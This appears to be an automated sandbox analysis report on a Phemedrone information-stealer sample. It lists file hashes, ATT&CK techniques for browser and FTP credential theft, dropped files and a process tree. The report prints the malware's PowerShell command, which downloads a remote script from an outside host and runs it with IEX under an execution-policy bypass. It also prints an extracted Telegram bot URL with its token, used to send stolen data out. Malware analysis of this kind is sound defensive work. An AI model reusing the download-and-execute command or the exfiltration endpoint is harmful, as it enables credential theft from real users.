phemedrone | cf896e7e2e4b7c96be7b460ed2899e780a703ead9e0d85a45b269b08c4cc3b6e

Analysis

max time kernel
146s
max time network
139s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
04-11-2024 08:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cf896e7e2e4b7c96be7b460ed2899e780a703ead9e0d85a45b269b08c4cc3b6e.exe
Size

6.8MB
MD5

fb72ca714fe862deb161d3d443937314
SHA1

cc15d694a24ab347148d768c54b445690a107bac
SHA256

cf896e7e2e4b7c96be7b460ed2899e780a703ead9e0d85a45b269b08c4cc3b6e
SHA512

1f2071b9da49b7813a5653dad076045acf692572d23c3e9b0ac3176046c6f56fa4b27b4d5bea4d7c69a06f8a8f95a58979c5777cb353d0ae05299287f721f413
SSDEEP

196608:R6Y8XMCHGLLc54i1wN+lPIcu9KYK39sI3PPJNMRRccx:6XMCHWUjqcuI3/PJNe

Score

10^/10

phemedrone credential_access execution spyware stealer

Malware Config

Extracted

Family

phemedrone

https://api.telegram.org/bot8091768794:AAFZsJ1h-6BiszgyLm-eH6c-uITQ7Z99Wbc/sendDocument

Signatures

Phemedrone
An information and wallet stealer written in C#.
stealer phemedrone
Phemedrone family
phemedrone
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

9 4968 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Powershell Invoke Web Request.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

4968 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

WDSecureUtil_609.exe

pid process

4860 WDSecureUtil_609.exe

flow	pid	process
9	4968	powershell.exe

pid	process
4860	WDSecureUtil_609.exe

Loads dropped DLL 2 IoCs

Processes:

cf896e7e2e4b7c96be7b460ed2899e780a703ead9e0d85a45b269b08c4cc3b6e.exe

pid	process
3644	cf896e7e2e4b7c96be7b460ed2899e780a703ead9e0d85a45b269b08c4cc3b6e.exe
3644	cf896e7e2e4b7c96be7b460ed2899e780a703ead9e0d85a45b269b08c4cc3b6e.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Suspicious behavior: EnumeratesProcesses 30 IoCs

Processes:

powershell.exeWDSecureUtil_609.exe

pid	process
4968	powershell.exe
4968	powershell.exe
4860	WDSecureUtil_609.exe
4860	WDSecureUtil_609.exe
4860	WDSecureUtil_609.exe
4860	WDSecureUtil_609.exe
4860	WDSecureUtil_609.exe
4860	WDSecureUtil_609.exe
4860	WDSecureUtil_609.exe
4860	WDSecureUtil_609.exe
4860	WDSecureUtil_609.exe
4860	WDSecureUtil_609.exe
4860	WDSecureUtil_609.exe
4860	WDSecureUtil_609.exe
4860	WDSecureUtil_609.exe
4860	WDSecureUtil_609.exe
4860	WDSecureUtil_609.exe
4860	WDSecureUtil_609.exe
4860	WDSecureUtil_609.exe
4860	WDSecureUtil_609.exe
4860	WDSecureUtil_609.exe
4860	WDSecureUtil_609.exe
4860	WDSecureUtil_609.exe
4860	WDSecureUtil_609.exe
4860	WDSecureUtil_609.exe
4860	WDSecureUtil_609.exe
4860	WDSecureUtil_609.exe
4860	WDSecureUtil_609.exe
4860	WDSecureUtil_609.exe
4860	WDSecureUtil_609.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exeWDSecureUtil_609.exe

description pid process

Token: SeDebugPrivilege 4968 powershell.exe
Token: SeDebugPrivilege 4860 WDSecureUtil_609.exe

description	pid	process
Token: SeDebugPrivilege	4968	powershell.exe
Token: SeDebugPrivilege	4860	WDSecureUtil_609.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

cf896e7e2e4b7c96be7b460ed2899e780a703ead9e0d85a45b269b08c4cc3b6e.execf896e7e2e4b7c96be7b460ed2899e780a703ead9e0d85a45b269b08c4cc3b6e.execmd.exepowershell.exe

description	pid	process	target process
PID 1536 wrote to memory of 3644	1536	cf896e7e2e4b7c96be7b460ed2899e780a703ead9e0d85a45b269b08c4cc3b6e.exe	cf896e7e2e4b7c96be7b460ed2899e780a703ead9e0d85a45b269b08c4cc3b6e.exe
PID 1536 wrote to memory of 3644	1536	cf896e7e2e4b7c96be7b460ed2899e780a703ead9e0d85a45b269b08c4cc3b6e.exe	cf896e7e2e4b7c96be7b460ed2899e780a703ead9e0d85a45b269b08c4cc3b6e.exe
PID 3644 wrote to memory of 1676	3644	cf896e7e2e4b7c96be7b460ed2899e780a703ead9e0d85a45b269b08c4cc3b6e.exe	cmd.exe
PID 3644 wrote to memory of 1676	3644	cf896e7e2e4b7c96be7b460ed2899e780a703ead9e0d85a45b269b08c4cc3b6e.exe	cmd.exe
PID 1676 wrote to memory of 4968	1676	cmd.exe	powershell.exe
PID 1676 wrote to memory of 4968	1676	cmd.exe	powershell.exe
PID 4968 wrote to memory of 4860	4968	powershell.exe	WDSecureUtil_609.exe
PID 4968 wrote to memory of 4860	4968	powershell.exe	WDSecureUtil_609.exe

C:\Users\Admin\AppData\Local\Temp\cf896e7e2e4b7c96be7b460ed2899e780a703ead9e0d85a45b269b08c4cc3b6e.exe
"C:\Users\Admin\AppData\Local\Temp\cf896e7e2e4b7c96be7b460ed2899e780a703ead9e0d85a45b269b08c4cc3b6e.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1536

C:\Users\Admin\AppData\Local\Temp\cf896e7e2e4b7c96be7b460ed2899e780a703ead9e0d85a45b269b08c4cc3b6e.exe
"C:\Users\Admin\AppData\Local\Temp\cf896e7e2e4b7c96be7b460ed2899e780a703ead9e0d85a45b269b08c4cc3b6e.exe"
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando2'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script""
3⤵
- Suspicious use of WriteProcessMemory
PID:1676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando2'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"
4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4968

C:\Users\Admin\AppData\Roaming\WDSecureUtil_609.exe
"C:\Users\Admin\AppData\Roaming\WDSecureUtil_609.exe" -pkek -aoa -y
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4860

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI15362\VCRUNTIME140.dll

Filesize
117KB

MD5
862f820c3251e4ca6fc0ac00e4092239

SHA1
ef96d84b253041b090c243594f90938e9a487a9a

SHA256
36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153

SHA512
2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15362\_bz2.pyd

Filesize
82KB

MD5
cb8c06c8fa9e61e4ac5f22eebf7f1d00

SHA1
d8e0dfc8127749947b09f17c8848166bac659f0d

SHA256
fc3b481684b926350057e263622a2a5335b149a0498a8d65c4f37e39dd90b640

SHA512
e6da642b7200bfb78f939f7d8148581259baa9a5edda282c621d14ba88083a9b9bd3d17b701e9cde77ad1133c39bd93fc9d955bb620546bb4fcf45c68f1ec7d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15362\_decimal.pyd

Filesize
271KB

MD5
f3377f3de29579140e2bbaeefd334d4f

SHA1
b3076c564dbdfd4ca1b7cc76f36448b0088e2341

SHA256
b715d1c18e9a9c1531f21c02003b4c6726742d1a2441a1893bc3d79d7bb50e91

SHA512
34d9591590bba20613691a5287ef329e5927a58127ce399088b4d68a178e3af67159a8fc55b4fcdcb08ae094753b20dec2ac3f0b3011481e4ed6f37445cecdd5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15362\_hashlib.pyd

Filesize
62KB

MD5
32d76c9abd65a5d2671aeede189bc290

SHA1
0d4440c9652b92b40bb92c20f3474f14e34f8d62

SHA256
838d5c8b7c3212c8429baf612623abbbc20a9023eec41e34e5461b76a285b86c

SHA512
49dc391f4e63f4ff7d65d6fd837332745cc114a334fd61a7b6aa6f710b235339964b855422233fac4510ccb9a6959896efe880ab24a56261f78b2a0fd5860cd9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15362\_lzma.pyd

Filesize
154KB

MD5
1ba022d42024a655cf289544ae461fb8

SHA1
9772a31083223ecf66751ff3851d2e3303a0764c

SHA256
d080eabd015a3569813a220fd4ea74dff34ed2a8519a10473eb37e22b1118a06

SHA512
2b888a2d7467e29968c6bb65af40d4b5e80722ffdda760ad74c912f3a2f315d402f3c099fde82f00f41de6c9faaedb23a643337eb8821e594c567506e3464c62

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15362\_socket.pyd

Filesize
81KB

MD5
fe896371430bd9551717ef12a3e7e818

SHA1
e2a7716e9ce840e53e8fc79d50a77f40b353c954

SHA256
35246b04c6c7001ca448554246445a845ce116814a29b18b617ea38752e4659b

SHA512
67ecd9a07df0a07edd010f7e3732f3d829f482d67869d6bce0c9a61c24c0fdc5ff4f4e4780b9211062a6371945121d8883ba2e9e2cf8eb07b628547312dfe4c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15362\base_library.zip

Filesize
1.3MB

MD5
a9cbd0455b46c7d14194d1f18ca8719e

SHA1
e1b0c30bccd9583949c247854f617ac8a14cbac7

SHA256
df6c19637d239bfedc8cd13d20e0938c65e8fdf340622ff334db533f2d30fa19

SHA512
b92468e71490a8800e51410df7068dd8099e78c79a95666ecf274a9e9206359f049490b8f60b96081fafd872ec717e67020364bcfa972f26f0d77a959637e528

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15362\libcrypto-3.dll

Filesize
5.0MB

MD5
123ad0908c76ccba4789c084f7a6b8d0

SHA1
86de58289c8200ed8c1fc51d5f00e38e32c1aad5

SHA256
4e5d5d20d6d31e72ab341c81e97b89e514326c4c861b48638243bdf0918cfa43

SHA512
80fae0533ba9a2f5fa7806e86f0db8b6aab32620dde33b70a3596938b529f3822856de75bddb1b06721f8556ec139d784bc0bb9c8da0d391df2c20a80d33cb04

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15362\python313.dll

Filesize
5.8MB

MD5
b9de917b925dd246b709bb4233777efd

SHA1
775f258d8b530c6ea9f0dd3d1d0b61c1948c25d2

SHA256
0c0a66505093b6a4bb3475f716bd3d9552095776f6a124709c13b3f9552c7d99

SHA512
f4bf3398f50fdd3ab7e3f02c1f940b4c8b5650ed7af16c626ccd1b934053ba73a35f96da03b349c1eb614bb23e0bc6b5cc58b07b7553a5c93c6d23124f324a33

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15362\select.pyd

Filesize
30KB

MD5
20831703486869b470006941b4d996f2

SHA1
28851dfd43706542cd3ef1b88b5e2749562dfee0

SHA256
78e5994c29d8851f28b5b12d59d742d876683aea58eceea1fb895b2036cdcdeb

SHA512
4aaf5d66d2b73f939b9a91e7eddfeb2ce2476c625586ef227b312230414c064aa850b02a4028363aa4664408c9510594754530a6d026a0a84be0168d677c1bc4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15362\unicodedata.pyd

Filesize
693KB

MD5
0902d299a2a487a7b0c2d75862b13640

SHA1
04bcbd5a11861a03a0d323a8050a677c3a88be13

SHA256
2693c7ee4fba55dc548f641c0cb94485d0e18596ffef16541bd43a5104c28b20

SHA512
8cbef5a9f2d24da1014f8f1ccbddd997a084a0b04dd56bcb6ac38ddb636d05ef7e4ea7f67a085363aad3f43d45413914e55bdef14a662e80be955e6dfc2feca3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xsttc2au.t32.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\WDSecureUtil_609.exe

Filesize
246KB

MD5
e082366c147031e7aaf6ca47a0110ad3

SHA1
51223ecf048edf1627f0f182e923922ff19bbb28

SHA256
607d41c88298d5fdd3624d6ba7a7ae36f7cd90b20bc03390977740fed8b4065d

SHA512
cd91e9852e886451245855ccbc370c6b81cddb6461277f325fabedf0b8fa7d473e582094b66be099266942e9baa18c908a7c6d0db80128dd946a56be0e70ac7f

Download Submit
memory/4860-51-0x00000145C9180000-0x00000145C91C4000-memory.dmp

Filesize
272KB

Download
memory/4968-24-0x00007FFCD8163000-0x00007FFCD8165000-memory.dmp

Filesize
8KB

Download
memory/4968-36-0x00007FFCD8160000-0x00007FFCD8C21000-memory.dmp

Filesize
10.8MB

Download
memory/4968-37-0x00007FFCD8160000-0x00007FFCD8C21000-memory.dmp

Filesize
10.8MB

Download
memory/4968-38-0x00007FFCD8160000-0x00007FFCD8C21000-memory.dmp

Filesize
10.8MB

Download
memory/4968-35-0x00007FFCD8160000-0x00007FFCD8C21000-memory.dmp

Filesize
10.8MB

Download
memory/4968-34-0x00000177338F0000-0x0000017733912000-memory.dmp

Filesize
136KB

Download
memory/4968-52-0x00007FFCD8160000-0x00007FFCD8C21000-memory.dmp

Filesize
10.8MB

Download
memory/4968-53-0x00007FFCD8163000-0x00007FFCD8165000-memory.dmp

Filesize
8KB

Download
memory/4968-57-0x00007FFCD8160000-0x00007FFCD8C21000-memory.dmp

Filesize
10.8MB

Download